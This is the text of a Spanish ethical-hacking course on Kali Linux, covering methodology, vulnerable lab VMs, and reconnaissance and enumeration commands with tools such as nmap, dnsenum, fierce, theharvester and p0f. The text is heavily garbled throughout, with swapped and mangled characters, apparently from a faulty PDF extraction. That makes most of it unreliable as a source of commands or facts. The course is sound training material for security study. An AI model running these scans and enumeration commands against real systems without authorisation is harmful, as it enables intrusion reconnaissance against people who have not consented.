You are on page 1of 79

Hacking con Kali Linux

Curso Online
Alonso Eduardo
Caballero Quezada
Versin 2.1 Octubre del 2013
KALI LINUX is a tradear! "# O##ensi$e %ecurit&.'
Puede obtener la versin ms actual de este documento en: http://www.reydes.com/d/?q=node/2
Sobre el Instructor
Al"ns" (duard" )aballer" *ue+ada es ,rainbenc- )erti#ied Net."r! %ecurit&/ )"0uter 1"rensics
2U.%.3 4 Linu5 Adinistrati"n 26eneral3/ )N7(/ )N)1/ )N7A8/ 6IA) %%9:)N%A & ;iebr" de
O0en 8eb A00licati"n %ecurit& 9r"<ect 2O8A%93. )uenta c"n =s de "nce a>"s de e50eriencia en el
=rea & desde -ace seis a>"s lab"ra c"" )"nsult"r e Instruct"r Inde0endiente en las =reas de
7ac!in? @tic"/ In#"r=tica 1"rense & 6NUALinu5. 9erteneci 0"r uc-"s a>"s al ?ru0" internaci"nal
de %e?uridad Bare6aC+ e inte?ra actualente el 6ru0" 9eruan" de %e?uridad 9eru%(). 7a dictad"
curs"s en 9erD & (cuad"r/ 0resent=nd"se tabiEn c"nstanteente en e50"sici"nes en#"cadas a/
7ac!in? @tic"/ In#"r=tica 1"rense/ 6NUALinu5 & %"#t.are Libre. %u c"rre" electrnic" es
BeFGe%H?ail.c" & su 0=?ina 0ers"nal est= enI -tt0IAA....BeFGe%.c"
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Temario
1. Intr"duccin a Kali Linu5
2. ;et"d"l"?Ja de una 9rueba de 9enetracin
3. ;=Kuinas Vulnerables
L. )a0turar In#"racin
M. Gescubrir el Ob<eti$"
N. (nuerar el Ob<eti$"
O. ;a0ear Vulnerabilidades
P. (50l"tar el Ob<eti$"
Q. Atacar )"ntrase>as
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Material ecesario
9ara desarr"llar el 0resente )urs"/ se su?iere Kue el 0artici0ante instale & c"n#i?ure las =Kuinas
$irtuales de Kali Linu5 & ;etas0l"itable 2 c"n V;.are 9la&er u "tr" s"#t.are 0ara $irtuali+acin.
M!"uina #irtual de Kali Linux $%&%'
Lin! de Gescar?aI http://www.kali.or/downloads/
N"bre del Arc-i$"I !ali:linu5:1.0:i3PN:?n"e:$.tar.?+
Metas(loitable )%
Lin! de Gescar?aI http://source!ore.net/pro"ects/metasploitable/!iles/#etasploitable2/
N"bre del Arc-i$"I etas0l"itable:linu5:2.0.0.+i0
%"#t.are de Virtuali+acin
V;.are 9la&er
Lin! de Gescar?aI http://www.vmware.com/products/player/
N"bre del Arc-i$"I V;.are:0la&er:N.0.0:12QMQP0.e5e
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
$% Introducci*n a Kali Linux
Kali Linu5 es la nue$a ?eneracin de la distribucin Linu5 ,ac!Rrac! 0ara reali+ar Audit"rJas de
%e?uridad & 9ruebas de 9enetracin. Kali Linu5 es una 0lata#"ra basada en 6NUALinu5 Gebian & es
una rec"nstruccin c"0leta de ,ac!Rrac!/ la cual c"ntiene una ?ran cantidad de -erraientas 0ara
ca0turar in#"racin/ identi#icar $ulnerabilidades/ e50l"tarlas/ escalar 0ri$ile?i"s & cubrir las -uellas.
(ste )urs" 0r"0"rci"na una e5celente ?uJa 0r=ctica 0ara utili+ar las -erraientas =s 0"0ulares Kue
abarcan las bases de las 9ruebas de 9enetracin incluidas en Kali Linu5. AsJ is"/ este curs" es
una e5celente #uente de c"n"ciient" tant" 0ara l"s 0r"#esi"nales c"" 0ara l"s n"$at"s.
$%$ Caracter+sticas de Kali Linux
Kali Linu5 es una c"0leta rec"nstruccin de ,ac!Rrac! Linu5/ & se ad-iere c"0letaente a l"s
est=ndares de desarr"ll" de Gebian. %e -a 0uest" en #unci"naient" t"da una nue$a in#raestructura/
t"das las -erraientas -an sid" re$isadas & e0aKuetadas/ & se utili+a a-"ra 6it 0ara el V)%.
;=s de 300 -erraientas de 9ruebas de 9enetracin
(s Libre & sie0re l" ser=
Srb"l 6it O0en %"urce
)u0le c"n 17% 21iles&ste 7ierarc-& %tandart3
A0li" s"0"rte 0ara dis0"siti$"s inal=bric"s
9arc-es al Kernel 0ara in&eccin.
(nt"rn" de desarr"ll" se?ur"
9aKuetes & re0"sit"ri"s #irad"s c"n 696
Vari"s len?ua<es
)"0letaente 0ers"nali+able
%"0"rte AB;(L & AB;71
$%) Obtener Kali Linux
Kali Linu5 0uede ser descar?ad" 0ara di#erentes arKuitecturas/ c"" i3PN/ adNL & arel/ ar-#.
Tnicaente 0ara la arKuitectura i3PN 0uede ser descar?ad" &a sea en una ia?en I%O " en una
=Kuina $irtual 0ara V;8are. Ade=s 0uede ser descar?ad" ediante descar?a directa " ediante
R"rrent.
Kali Linu5 0uede ser descar?ad" desde la si?uiente 0=?inaI
-tt0IAA....!ali."r?Ad".nl"adsA
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
$%, Instalaci*n de Kali Linux
Kali Linu5 0uede ser instalad" en un disc" dur"/ 0ara reali+ar un arranKue dual c"n un %istea
O0erati$" 8ind".s/ instalad" en una unidad U%, e instalad" en un disc" ci#rad".
%e 0uede enc"ntrar la in#"racin detallada s"bre la instalacin de Kali Linu5 en la si?uiente 0=?inaI
-tt0IAAd"cs.!ali."r?Acate?"r&Ainstallati"n
$%' Cambiar la Contrase-a del root
9"r una buena 0r=ctica de se?uridad se rec"ienda cabiar la c"ntrase>a 0"r de#ect" del usuari"
r""t. (st" di#icultar= Kue usuari"s alici"s"s 0ueden "btener acces" al sistea/ c"n esta cla$e 0"r
de#ect".
# passwd root
Enter new UNIX password:
Retype new UNIX password:
UVW La c"ntrase>a n" ser= "strada ientras sea escrita & est= deber= ser in?resada d"s $eces.
$%. Iniciando Ser#icios de /ed
Kali Linu5 $iene c"n al?un"s ser$ici"s de red/ l" cuales 0ueden ser de utilidad en $arias situaci"nes &
Kue est= des-abilitadas 0"r de#ect". (st"s ser$ici"s s"n/ 7RR9/ ;esta0l"it/ ;&%*L & %%7. 9"r
e<e0l"/ 0ara iniciar el ser$ici" 7RR9 se debe e<ecutar el si?uiente c"and"
# /etc/init.d/apache2 start
L"s cuatr" ser$ici"s/ detallad"s en el 0=rra#" anteri"r/ tabiEn 0ueden iniciad"s & detenid"s desdeI
A00licati"ns :X Kali Linu5 :X %&ste %er$ices.
Kali Linu5 tiene d"cuentacin "#icial s"bre $ari"s de sus as0ect"s & caracterJsticas. La
d"cuentacin est= en c"nstante traba<" & 0r"?res". (sta d"cuentacin 0uede ser ubicada en la
si?uiente 0=?inaI
-tt0IAAd"cs.!ali."r?A
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
(l %iti" O#icial de Kali Linu5 esI -tt0IAA....!ali."r?A
Ia?en 1:1. (scrit"ri" de Kali Linu5
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
)% Metodolog+a de una 0rueba de 0enetraci*n
Una 9rueba de 9enetracin es el 0r"ces" utili+ad" 0ara reali+ar una e$aluacin " audit"rJa de
se?uridad de un alt" ni$el. Una et"d"l"?Ja de#ine un c"n<unt" de re?las/ 0r=cticas/ 0r"cediient"s &
Et"d"s Kue se si?uen e i0leentan/ durante la reali+acin de cualKuier 0r"?raa de audit"rJa en
se?uridad de la in#"racin. Una et"d"l"?Ja de 0ruebas de 0enetracin de#ine una -"<a de ruta c"n
ideas Dtiles & 0r=cticas c"0r"badas/ las cuales deben ser ane<adas c"n cuidad" 0ara 0"der
e$aluar c"rrectaente l"s sisteas de se?uridad.
)%$ Ti(os de 0ruebas de 0enetraci*n1
(5isten di#erentes ti0"s de 9ruebas de 9enetracin/ las =s c"unes & ace0tadas s"n Las 9ruebas
de 9enetracin de )a<a Ne?ra 2,lac!:,"53/ las 9ruebas de 9enetracin de )a<a ,lanca 28-ite:,"53 &
las 9ruebas de 9enetracin de )a<a 6ris 26re&:,"53
9rueba de )a<a Ne?ra.
N" se tienen nin?Dn ti0" de c"n"ciient" antici0ad" s"bre la red de la "r?ani+acin. Un
e<e0l" de este escenari"/ es cuand" se reali+a una 0rueba e5terna a ni$el .eb/ & est= es
reali+ada s"l" c"n el detalle de una UBL " direccin I9/ el cual es 0r"0"rci"nad" al eKui0" de
0ruebas. (st" siula el r"l de intentar irru0ir en el siti" .eb " red de la "r?ani+acin. AsJ
is" siula un ataKue e5tern" reali+ad" 0"r un atacante alici"s".
9rueba de )a<a ,lanca.
(l eKui0" de 0ruebas cuenta c"n acces" 0ara e$aluar las redes & -a sid" d"tad" de
dia?raas de la red & detalles de -ard.are/ sisteas "0erati$"s/ a0licaci"nes/ entre "tra
in#"racin/ antes de Kue la 0rueba sea reali+ada. (st" n" i?uala a una 0rueba sin
c"n"ciient" 0er" 0uede acelerar el 0r"ces" en ?ran edida & "btener resultad"s =s
0recis"s. La cantidad de c"n"ciient" 0re$i" c"nduce a reali+ar las 0ruebas a sisteas
"0erati$"s es0ecJ#ic"s/ a0licaci"nes & dis0"siti$"s de red Kue residen en la red en lu?ar de
in$ertir tie0" enuerand" l" Kue 0"drJa 0"sibleente estar en la red. (ste ti0" de 0rueba
eKui0ara una situacin d"nde el atacante 0uede tener c"n"ciient" c"0let" de la red
interna.
9rueba de )a<a 6ris
(l eKui0" de 0ruebas siula un ataKue Kue 0uede ser reali+ad" 0"r un iebr" de la
"r?ani+acin inc"n#"re " desc"ntent". (l eKui0" de 0ruebas debe ser d"tad" c"n l"s
0ri$ile?i"s adecuad"s a ni$el de usuari" & una cuenta de usuari"/ ade=s de 0eritirle acces"
a la red interna.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
)%) E#aluaci*n de 2ulnerabilidades 3 0rueba de 0enetraci*n%
Una e$aluacin de $ulnerabilidades es el 0r"ces" de e$aluar l"s c"ntr"les de se?uridad interna &
e5terna 0ara identi#icar las aena+as Kue 0lanteen una seria e50"sicin 0ara l"s acti$"s de la
"r?ani+acin.
La 0rinci0al di#erencia entre una e$aluacin de $ulnerabilidades & una 0rueba de 0enetracin radica
en Kue las 0ruebas de 0enetracin $an =s all= del ni$el de Dnicaente identi#icar $ulnerabilidades &
$an -acia el 0r"ces" de la e50l"tacin de estas $ulnerabilidades/ escalar 0ri$ile?i"s/ & antener el
acces" en el sistea "b<eti$". ;ientras Kue la e$aluacin de $ulnerabilidades 0r"0"rci"na una a0lia
$isin de las #allas e5istentes en l"s sisteas sin edir el i0act" real de estas #allas 0ara l"s
sisteas en c"nsideracin.
)%, Metodolog+as de 0ruebas de Seguridad
(5isten $arias et"d"l"?Jas "0en s"urce Kue tratan de c"nducir " ?uiar las necesidades de las
e$aluaci"nes en se?uridad. La idea 0rinci0al de utili+ar una et"d"l"?Ja durante la e$aluacin es
e<ecutar di#erentes ti0"s de 0ruebas 0as" a 0as" 0ara 0"der <u+?ar c"n uc-a 0recisin la se?uridad
de un sistea. (ntre estas et"d"l"?Jas se encuentran las si?uientesI
O0en %"urce %ecurit& Restin? ;et-"d"l"?& ;anual 2O%%R;;3
-tt0IAA....isec"."r?Aresearc-A
R-e 9enetrati"n Restin? (5ecuti"n %tandard 29R(%3
-tt0IAA....0entest:standard."r?A
9enetrati"n Restin? 1rae."r!
-tt0IAA....$ulnerabilit&assessent.c".u!A9enetrati"nY20Rest.-tl
In#"rati"n %&stes %ecurit& Assessent 1rae."r! 2I%%A13
-tt0IAA...."iss?."r?Aissa#
O8A%9 Restin? 6uide
-tt0sIAA....".as0."r?Ainde5.0-0A)ate?"r&IO8A%9ZRestin?Z9r"<ect
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
,% M!"uinas 2ulnerables
,%$ Ma"uinas 2irtuales 2ulnerables
Nada e<"r Kue tener un lab"rat"ri" 0ara 0racticar l"s c"n"ciient"s adKuirid"s en 9ruebas de
9enetracin. (st" aunad" a la #acilidad Kue 0r"0"rci"na el s"#t.are de $irtuali+acin/ -ace bastante
sencill" crear una =Kuina $irtual $ulnerable " descar?ar una =Kuina $irtual $ulnerable.
A c"ntinuacin se detalla un bre$e listad" de al?unas =Kuinas $irtuales creadas es0ecialente c"n
$ulnerabilidades/ las cuales 0ueden ser utili+adas 0ara 0r"0sit"s entrenaient" & a0rendi+a<e en
teas relaci"nad"s a la se?uridad/ -ac!in? Etic"/ 0ruebas de 0enetracin/ an=lisis de
$ulnerabilidades/ in#"r=tica #"rense/ etc.
Metas(loitable
Lin! de Gescar?aI
-tt0IAAs"urce#"r?e.netA0r"<ectsA$irtual-ac!in?A#ilesA"sAetas0l"itableA;etas0l"itable:0M:
2010.+i0Ad".nl"ad
Metas(loitable)
Lin! de Gescar?aI
-tt0IAAs"urce#"r?e.netA0r"<ectsAetas0l"itableA#ilesA;etas0l"itable2Aetas0l"itable:linu5:
2.0.0.+i0Ad".nl"ad
Kio(trix Le#el $
Lin! de Gescar?aI
-tt0IAA....!i"0tri5.c"Adl$AKi"0tri5ZLe$elZ1.rar
4e5ICE
Lin! de Gescar?aI
-tt0IAAs"urce#"r?e.netA0r"<ectsA$irtual-ac!in?A#ilesA"sAde:iceAde:ice.net:1.100:1.1.is"Ad".nl"ad
06nOS
Lin! de Gescar?aI
-tt0IAAs"urce#"r?e.netA0r"<ectsA$irtual-ac!in?A#ilesA"sA08nO%A08nO%Y20$1.0.+i0Ad".nl"ad
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
,%) Introducci*n a Metas(loitable)
-tt0IAAs"urce#"r?e.netA0r"<ectsAetas0l"itableA#ilesA;etas0l"itable2A
;etas0l"itable 2 es una =Kuina $irtual basada en 6NUALinu5 creada intenci"nalente 0ara ser
$ulnerable. (sta =Kuina $irtual 0uede ser utili+ada 0ara reali+ar entrenaient"s en se?uridad/
e$aluar -erraientas de se?uridad/ & 0racticar tEcnicas c"unes de 0ruebas de 0enetracin.
(sta =Kuina $irtual nunca debe ser e50uesta a una red 0"c" c"n#iable/ se su?iere utili+arla en
"d"s NAR " 7"st:"nl&.
Ia?en 3:1. )"ns"la 0resentada al iniciar ;etas0l"itable2
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
'% Ca(turar In7ormaci*n
(n esta #ase se intenta rec"lectar t"da la in#"racin Kue sea 0"sible s"bre el "b<eti$"/ 0"r e<e0l"
0"sibles n"bres de usuari"s/ direcci"nes I9/ ser$id"res de n"bre/ & "tra in#"racin. Gurante esta
#ase cada 0ie+a de in#"racin "btenida es i0"rtante & n" debe ser subestiada.
(l 0r"ces" d"nde se ca0tura la in#"racin 0uede ser di$idida de d"s aneras. La ca0tura de
in#"racin acti$a & la ca0tura de in#"racin 0asi$a. (n el 0riera #"ra/ se rec"lecta in#"racin
en$iand" tr=#ic" a la red "b<eti$"/ c"" 0"r e<e0l" -acer 0in? I);9/ & escane"s de 0uert"s
R)9AUG9. 9ara el se?und" cas"/ se "btiene in#"racin s"bre la red "b<eti$" utili+and" ser$ici"s "
#uentes de tercer"s/ c"" 0"r e<e0l" 6""?le/ ,in?/ " redes s"ciales.
'%$ 8uentes 09blicas
(5isten uc-"s recurs"s 0Dblic"s en Internet Kue 0ueden ser utili+ad"s 0ara rec"lectar in#"racin
s"bre el "b<eti$". La $enta<a de utili+ar este ti0" de recurs"s es la n" ?eneracin de tr=#ic" de anera
directa -acia el "b<eti$"/ de esta #"ra se inii+a la 0r"babilidad de ser detectad"s 0"r el "b<eti$".
Al?un"s #uentes 0Dblicas de re#erencia s"nI
R-e 8a&bac! ;ac-ineI
-tt0IAAarc-i$e."r?A.ebA.eb.0-0
Netcra#tI
-tt0IAAsearc-dns.netcra#t.c"A
%er$er%ni##
-tt0IAAser$ersni##.netAinde5.0-0
B"bte5
-tt0IAA....r"bte5.c"A
)entralO0s
-tt0IAAcentral"0s.netAc"A
'%) Ca(turar 4ocumentos
%e utili+an -erraientas 0ara rec"lectar in#"racin desde l"s d"cuent"s dis0"nibles en el siti" .eb
del "b<eti$". 9ara este 0r"0sit" se 0uede utili+ar tabiEn un "t"r de bDsKueda c"" 6""?le.
Metagoo7il
-tt0IAA....ed?e:securit&.c"Aeta?""#il.0-0
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# metagoofil
# metagoofil -d nmap.org -t pdf -l 2 -n ! -o /tmp/ -f
/tmp/res"ltados#mgf.html
Ia?en L:1. 9arte de la in#"racin de %"#t.are & c"rre"s electrnic" de l"s d"cuent"s anali+ad"s
'%, In7ormaci*n de 4S
4Senum
-tt0IAAc"de.?""?le.c"A0AdnsenuA
# cd /"sr/share/dnsen"m/
# dnsen"m --en"m hac$thissite.org
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:2. 9arte de l"s resultad"s "btenid"s 0"r dnsenu
7ierce
-tt0IAA-a.c!ers."r?A#ierceA
# fierce --help
# fierce -dnsser%er d.ns.&"ddyns.com-dns hac$thissite.org -wordlist
/"sr/share/dnsen"m/dns.t't (file /tmp/res"ltado#fierce.t't
La -erraienta dnsenu trae d"s listas de 0alabras 2dns.t5t & dns:bi?.t5t3. Las cuales 0ueden ser
utili+adas c"n cualKuier "tra -erraienta Kue las reKuiera/ c"" #ierce en este cas".
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:3. (<ecucin de #ierce & la bDsKueda de subd"ini"s.
'%' In7ormaci*n de la /uta
dmitr3
-tt0IAAlinu5.die.netAanA1Aditr&
# dmitry
# dmitry -w -e -n -s )*ominio+ -o /tmp/res"ltado#dmitry.t't
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:L. In#"racin de Netcra#t & de l"s subd"ini"s enc"ntrad"s.
(s buen" an"tar Kue ditr& n" uestra la in#"racin del -"st "b<eti$" desde Net#crat/ 0er" esta
in#"racin 0uede ser "btenida directaente desde su 0=?ina .eb en searc-dns.netcra#t.c".
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:M. In#"racin "btenida 0"r netcra#t.
traceroute
-tt0IAAlinu5.die.netAanAPAtracer"ute
La $ersin de tracer"ute 0ara sisteas 6NUALinu5 utili+a 0"r de#ect" 0aKuetes UG9.
# tracero"te --help
# tracero"te )*irecci,n#I-+
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:N. tracer"ute en #unci"naient".
2L"s n"bres de -"st & direcci"ns I9 -an sid" censurad"s c"ncienteente3
tc(traceroute
-tt0IAAlinu5.die.netAanA1Atc0tracer"ute
tc0tracer"ute utili+a 0aKuetes R)9 0ara tra+ar la ruta al -"st "b<eti$".
# tcptracero"te --help
# tcptracero"te )*irecci,n#I-+
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:O. Besultad" "btenid"s 0"r tc0tracer"ute.
2L"s n"bres de -"st & direcci"nes I9 -an sid" censurad"s c"nscienteente3
'%. :tilizar Motores de ;9s"ueda
t-e-ar$ester
-tt0sIAAc"de.?""?le.c"A0At-e-ar$esterA
# thehar%ester
# thehar%ester -d nmap.org -l 2 -& &ing
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en L:P. )"rre"s electrnic"s & n"bres de -"st "btenid"s ediante ,in?
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
.% 4escubrir el Ob<eti#o
Ges0uEs de rec"lectar t"da la in#"racin 0"sible de la red "b<eti$" desde #uentes e5ternas/ c""
"t"res de bDsKueda/ es necesari" descubrir a-"ra las =Kuinas en el "b<eti$". (s decir enc"ntrar
cuales s"n las =Kuinas Kue est=n dis0"nibles en la red "b<eti$"/ 0ues si la =Kuina n" est=
dis0"nible/ n" se 0uede c"ntinuar c"n el 0r"ces"/ & se debe c"ntinuar c"n la si?uiente =Kuina.
RabiEn se deben "btener indici"s s"bre el sistea "0erati$" utili+ad" 0"r la =Kuina "b<eti$". R"da
esta in#"racin ser= de uc-a a&uda 0ara el 0r"ces" d"nde se deben a0ear las $ulnerabilidades.
.%$ Identi7icar la m!"uinas del ob<eti#o
nma(
-tt0IAAna0."r?A
# nmap -h
# nmap -sn )*irecci,n#I-+
# nmap -n -sn !.2.!/0.!./21
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en M:1. (scane" a un Ban?" de red c"n Na0
n(ing
-tt0IAAna0."r?An0in?A
# nping -h
# nping )*irecci,n#I-+
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en M:2. n0in? en$iand" tres 0aKuetes I);9 (c-" BeKuest
n0in? utili+a 0"r de#ect" el 0r"t"c"l" I);9. (n cas" el -"st "b<eti$" estE bl"Kueand" este 0r"t"c"l"/
se 0uede utili+ar el "d" de 0rueba R)9.
# nping --tcp )*irecci,n#I-+
.%) /econocimiento del Sistema O(erati#o
(ste 0r"cediient" c"nsiste en deterinar el sistea "0erati$" en #unci"nand" en las "b<eti$"s
acti$"s 0ara c"n"cer el ti0" de sistea Kue se est= 0enetrand".
nma(
-tt0IAAna0."r?A
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# nmap -2 )*irecci,n#I-+
Ia?en M:3. In#"racin del %istea O0erati$" de ;etas0l"itable2/ "btenid"s 0"r na0.
(&7
-tt0IAAlcatu#.c"redu0.c5A00#3A
Kali Linu5 trae instalada 0"r de#ect" la $ersin 2.0.P de 00#. La $ersin =s actual es la 3.0Nb/ la cual
0uede ser descar?ada desde el si?uiente enlaceI -tt0IAAlcatu#.c"redu0.c5A00#3AreleasesA00#:
latest.t?+
Antes de 0r"ceder c"n la instalacin de 00#/ se debe de instalar el 0aKuete lib0ca0:de$'/ c"n el
si?uiente c"and"I
# apt-get install li&pcap-de%
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
9ara instalar 00#/ si0leente descar?ue el arc-i$"/ 0"r e<e0l" dentr" del direct"ri" A"0tA & lue?"
0r"ceda c"n su instalacin/ de la si?uiente aneraI
# tar '3%f pf-latest.tg3
# cd pf-4./&
# ./&"ild.sh
Ia?en M:L. Instalacin satis#act"ri" de 00#.
# pf -h
# pf -i )Interfa3+ -l -o /tmp/res"ltado#pf.t't
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en M:M. In#"racin "btenida 0"r 00# de ;etas0l"itable2
9ara "btener resultad"s siilares a l"s e50uest"s en la Ia?en M:M/ se debe establecer una c"ne5in
al 0uert" P0 de ;etas0l"itable2 utili+and" el si?uiente c"and"I
# echo -e 56E7* / 688-/!.9r9n5 : nc -n )*irecci,n #I-+ 0
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
=% Enumerar el Ob<eti#o
La enueracin del "b<eti$" es un 0r"ces" utili+ad" 0ara enc"ntrar & rec"lectar in#"racin de l"s
0uert"s & ser$ici"s dis0"nibles en el "b<eti$". Usualente este 0r"ces" se reali+a lue?" de -aber
descubiert" el ent"rn" "b<eti$" ediante el escane" 0ara "btener l"s -"sts en #unci"naient". (ste
0r"ces" se reali+a usualente al is" tie0" Kue el 0r"ces" de descubriient".
=%$ Escaneo de 0uertos%
Reniend" &a c"n"ciient" del ran?" de la red & las =Kuinas acti$as en el "b<eti$"/ es "ent" de
0r"ceder c"n el escane" de 0uert"s 0ara "btener l"s 0uert"s R)9 & UG9 abiert"s.
nma(
-tt0IAAna0."r?A
9"r de#ect" na0 utili+a un escane" %FN/ 0er" este es substituid" 0"r un escane" )"nnect si el
usuari" n" tiene l"s 0ri$ile?i"s necesari"s 0ara en$iar 0aKuetes en brut". Ade=s de n" es0eci#icarse
l"s 0uert"s/ se escanean l"s 1/000 0uert"s =s 0"0ulares.
# nmap )*irecci,n#I-+
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en N:1. In#"racin "btenida c"n una escane" 0"r de#ect" utili+and" na0
9ara es0eci#icar un c"n<unt" de 0uert"s Kue se escanearan c"ntra un "b<eti$" se debe utili+ar la
"0cin :0' de na0/ se?uid" de la lista de 0uert"s " ran?" de 0uert"s.
# nmap -p!-/;;4; )*irecci,n#I-+
# nmap -p 0 !.2.!/0.!./21
# nmap -p 0 !.2.!/0.!./21 -o7 /tmp/res"ltado#nmap#p0.t't
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
1i?ura N:2. Besultad"s "btenid"s c"n na0 al escanear t"d"s l"s 0uert"s.
zenma(
-tt0IAAna0."r?A+ena0A
Cena0 es un 6UI 0ara na0. (s una a0licacin libre & "0en s"urce el cual a&uda a #acilitar el us"
de na0 a l"s 0rinci0iantes/ a la $e+ Kue 0r"0"rci"na caracterJsticas a$an+adas 0ara usuari"s =s
e50erientad"s.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en N:3. Ventana de Cena0
=%) Enumeraci*n de Ser#icios
(l Geterinar l"s ser$ici"s en #unci"naient" en cada 0uert" es0ecJ#ic" 0uede ase?urar una 0rueba
de 0enetracin satis#act"ria s"bre la red "b<eti$". RabiEn 0uede eliinar cualKuier duda ?enerada
del 0r"ces" del rec"n"ciient" de la -uella del sistea "0erati$".
nma(
-tt0IAAna0."r?A
# nmap -s< )*irecci,n#I-+
